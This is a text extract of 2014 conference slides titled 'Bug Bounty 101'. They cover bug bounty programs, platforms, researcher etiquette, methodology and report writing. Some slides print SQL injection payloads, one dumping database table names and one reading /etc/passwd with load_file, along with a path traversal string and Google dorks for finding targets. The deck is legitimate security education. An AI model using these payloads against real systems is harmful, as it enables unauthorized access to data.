Nbt con december-2014-slides
- 1. Bug Bounty 101
(Web Applications)
BEN SADEGHIPOUR (@NAHAMSEC)
HTTP://NAHAMSEC.COM
- 2. Why bug bounties?
Chances of finding bugs to put on your
resume.
Possibility of getting a job in the
industry.
Opportunity to make money while
attending college.
Less security breaches (hopefully).
Better and more secure apps.
More researchers from all over the
world.
More experience.
More bugs.
- 4. What are some popular programs?
Google:
Min. payout: $1337
Acquisitions’ min. payout: $100
Max. payout: $20,000
- 7. What are some popular programs?
Yahoo:
Min. payout: $50
Max. payout: $15,000
- 8. Flickr SQL Injection
PAYLOAD: order_id=-116564954 union select
group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables– -
- 9. Did I say SQL Injection?
Remote Command execution
PAYLOAD: order_id=-116564954 union select
load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14
,15– -
- 10. What are some popular programs?
Facebook:
Min. payout: $500
Max. payout: Unknown (Million dollars?)
Not enough details published by
researcher
- 11. What are some popular programs?
Microsoft (Online services):
Started on September 23, 2014
Min. payout: $500
Max. payout: Unknown
- 12. What are some popular programs?
GitHub
PayPal and Magento
Twitter
Square
cPanel/WHMCS
Complete list:
https://bugcrowd.com/list-of-bug-bounty-programs
- 14. What are some popular platforms?
BugCrowd
Managed or unmanaged programs
13,300 Researchers from all over the world
155 Bounties.
30,000+ Submissions.
Max Single Payout: $13,000.
- 15. What are some popular platforms?
CrowdCurity
Web application security
Main focus on bitcoin
~1500 Researchers
- 16. What are some popular platforms?
SYNACK
Customer details: unknown.
Number of researchers: unknown .
Requires a written and a practical test.
Focused on Web application as well as:
Host
Mobile
Reverse Engineering
Hardware
- 17. What are some popular platforms?
HackerOne
“Security Inbox”.
1,004 Hackers thanked.
71 Public programs.
$1.58M Bounties paid.
4,987 Bugs fixed
Internet bug bounty:
PHP
Ruby
Apache.
Etc.
- 18. The Basics of Bug Bounties.
Read the program rules.
Scope of the program.
Payout per based on bug type.
Requirements
How to get an account on their
platform?
Respect the program’s decisions.
Respect other researchers.
Quality vs Quantity.
Reputation in the industry.
Don’t make any threats.
Don’t ask for money or “swag” if it’s
not mentioned in the rules.
Don’t compare two programs.
Two programs = different budgets.
Don’t lie while comparing two
programs.
Don’t audit without permission.
Legal issues.
- 19. Quality vs Quantity
Most programs have an accurate reputation system
Google.
PayPal.
Facebook
BugCrowd (accuracy).
HackerOne (reputation).
Better reputation = more opportunities:
Private events.
Private Programs.
- 21. Maximizing your payout
Don’t doubt yourself.
You may still be the first to find it.
Check Everything!
Every parameter
Every POST request
User input validation
Forms
Profile pages.
Filters (Can you bypass it?)
Don’t go for the low hanging fruits:
Higher payout for critical vulnerabilities.
You may find some low severity bugs while looking for more critical ones.
Less chances of duplicates.
- 22. Methodology
Pick a target.
Pick an application.
Pick a vulnerability type.
Google:
site:tw.*.yahoo.com -news -sports -
knowledge -house -travel -money -
fashion -dictionary -charity -autos -
emarketing -maps -serviceplus -
screen -tech -mail -talk -bid -uwant -
stock -mall -buy -myblog -movies -
games -safely -bigdeals -finance -
info -mobile -help
- 23. Pick up a pattern
Look for the same parameter, functionality, file type or file name in
the same or other subdomains of the website.
3 SQL Injection on Yahoo by using Google.
Site:hk.*.yahoo.com + inurl:”id” + filetype:html
Try the same idea with other programs.
Profit!
- 24. Picking up a pattern?
(Not my sponsors. Just vulnerable to the same bug)
- 25. Ruby on Rails
File Name Enumeration:
../../../../../../etc/passwd
Possbile Full path disclosure (FPD)
File not found vs 404?
CVE-2014-7829
- 26. Making a Report
Be very specific.
Provide step-by-step instructions.
Include all the details needed in order to reproduce the issue.
Provide an attack scenario.
Why is it a big deal?
Can you access major private data?
Are you targeting a single use?
Provide screenshots if needed.
If you create a video, make it accurate, quick, and professional
- 27. Good vs. Bad
Don’t copy and paste others’ published reports
Program #1 by reporter #1 (18 days ago)
- 28. Good vs. Bad
Program #2, Reporter #2 (Reported 11 days ago)
- 31. Public Disclosure
Ask for permission before you publish anything
Varies with each program
BugCrowd – Just ask for each program.
HackerOne – Request public disclosure.
Email.
Some may decide not to disclose the vulnerability due to sensitive
information.
Example Yahoo:
Configurations
Path
Internal IP addresses
Username/Password
- 32. Future of Bug Bounties
More and more companies will start to offer bounties (hopefully!)
Amazon
Apple
eBay
Sony (Surprise!!)
More companies offering money and not “swag”.
Less free bugs.
- 33. Achievements from Bug Bounties
Connections.
Free services from different companies.
Job offer(s).
Some cash.
Lots of experience.
- 34. Learn from your peers!
Read on how others are approaching different vulnerabilities:
@Securatary (http://uzbey.com/bbp-funding)
@FransRosen (http://detectify.com)
@BitQuark (http://bitquark.co.uk)
@Fin1te (http://fin1te.net)
More awesome researchers:
http://Bugcrowd.com/leaderboard
https://www.crowdcurity.com/hall-of-fame
http://Hackerone.com/thanks